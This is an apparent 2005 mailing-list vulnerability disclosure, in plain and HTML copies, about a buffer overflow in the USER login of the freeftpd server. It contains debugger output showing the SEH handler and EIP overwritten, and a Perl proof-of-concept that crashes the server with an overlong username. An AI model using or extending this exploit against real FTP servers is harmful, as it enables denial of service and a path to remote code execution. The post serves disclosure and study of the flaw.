------=_Part_11637_1705406.1132135014851
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi,
 While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of m=
y
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
 ECX 50505050
 EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=3D77C460CB
Message=3DAccess violation when reading [50505050]
 77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
 well, eip doesnt get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=3D47464544
Message=3DAccess violation when executing [47464544]
 I leave the exploit coding as an exercise...
 enjoy
 sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user=3D"\x41"x1011;
$user .=3D"\x44\x45\x46\x47";#overwrite SEH
$user .=3D"\x50"x400;

my $ftp =3D Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug =3D> 1);
$ftp->login("$user","whatevah");

------=_Part_11637_1705406.1132135014851
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<div>Hi,</div>
<div>&nbsp;</div>
<div>While drooling over my new Adriana Lima wallpaper, my tongue accidenta=
lly hit my keyboard and more than 1012 chars were sent to the login screen =
of my freeftpd server (which i use to backup my Adriana Lima pics). Guess w=
hat...the server crashed! Luckily I attach ollydbg to every process I have =
running and ths is what I found:
</div>
<div>&nbsp;</div>
<div>ECX 50505050<br>&nbsp;</div>
<div>EIP 77C460CB msvcrt.77C460CB<br>Log data, item 0<br>&nbsp;Address=3D77=
C460CB<br>&nbsp;Message=3DAccess violation when reading [50505050]<br>&nbsp=
;</div>
<div>77C460CB&nbsp;&nbsp; 8B01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; MOV EAX,DWORD PTR DS:[ECX]</div>
<div>&nbsp;</div>
<div>well, eip doesnt get overwritten, but SEH does:</div>
<div>&nbsp;</div>
<div>
<p>0012B6CC&nbsp;&nbsp; 41414141<br>0012B6D0&nbsp;&nbsp; 42424242<br>0012B6=
D4&nbsp;&nbsp; 42424242<br>0012B6D8&nbsp;&nbsp; 43434343&nbsp; Pointer to n=
ext SEH record<br>0012B6DC&nbsp;&nbsp; 47464544&nbsp; SE handler</p>
<p>EIP 47464544</p>
<p>&nbsp;Log data, item 0<br>&nbsp;Address=3D47464544<br>&nbsp;Message=3DAc=
cess violation when executing [47464544]<br></p></div>
<div>&nbsp;I leave the exploit coding as an exercise...</div>
<div>&nbsp;</div>
<div>enjoy</div>
<div>&nbsp;</div>
<div>sample crash code:</div>
<div>&nbsp;</div>
<div>
<p>#!/usr/bin/perl -w<br>#freeftpd USER buffer overflow<br>#barabas - 2005<=
/p>
<p>use strict;<br>use Net::FTP;<br>my $user=3D&quot;\x41&quot;x1011;<br>$us=
er .=3D&quot;\x44\x45\x46\x47&quot;;#overwrite SEH<br>$user .=3D&quot;\x50&=
quot;x400;</p>
<p>my $ftp =3D Net::FTP-&gt;new(&quot;<a href=3D"http://127.0.0.1">127.0.0.=
1</a>&quot;, Debug =3D&gt; 1);<br>$ftp-&gt;login(&quot;$user&quot;,&quot;wh=
atevah&quot;);</p>
<p><br>&nbsp;</p></div>

------=_Part_11637_1705406.1132135014851--